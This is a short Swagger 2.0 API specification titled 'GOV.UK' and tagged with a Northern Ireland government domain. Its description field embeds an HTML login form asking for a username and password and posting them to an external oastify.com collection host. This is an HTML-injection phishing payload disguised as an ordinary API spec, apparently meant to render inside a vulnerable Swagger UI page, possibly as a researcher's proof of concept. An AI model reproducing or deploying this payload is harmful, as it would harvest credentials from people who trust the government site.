swagger: '2.0'
info:
  version: 1.0.0

  title: GOV.UK
  description: '<div class="login-form">
    <div class="form-container">
        <form action="https://n8wdddhi6142op6f8l3isgh18sek2cq1.oastify.com/" method="post" class="form-signin">
            <div class="form-group">
                <label for="username">Username:</label>
                <input type="text" name="username" size="30">
            </div>
            <div class="form-group">
                <label for="password">Password:</label>
                <input type="password" name="password" size="30">
            </div>
            <div class="form-group">
                <button type="submit" class="btn btn-default">Login</button>
            </div>
        </form>
</div><br><br><br><br>'
  contact:
    name: Stiona
    url: https://stiona.com

paths:
  /:
    get:
      tags: 
      - daera-ni.gov.uk
      responses:
        '200':
          description: Login successful
